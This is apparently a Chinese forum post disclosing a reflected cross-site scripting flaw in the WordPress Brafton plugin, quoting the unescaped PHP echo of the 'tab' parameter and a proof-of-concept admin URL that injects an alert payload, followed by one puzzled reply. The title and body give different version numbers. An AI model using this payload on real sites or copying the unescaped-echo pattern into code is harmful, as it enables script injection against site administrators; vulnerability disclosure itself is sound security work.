WordPress Brafton 3.3.10 xss漏洞

90_ · 发表于 2016-5-22 13:29:19

WordPress Brafton plugin version 3.3.0

DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php

in line 11 :

[PHP] 纯文本查看 复制代码

    tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo
0;}?>;

wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))

复制代码

浮尘 · 发表于 2016-5-23 12:30:39

什么东西？

我什么都没看到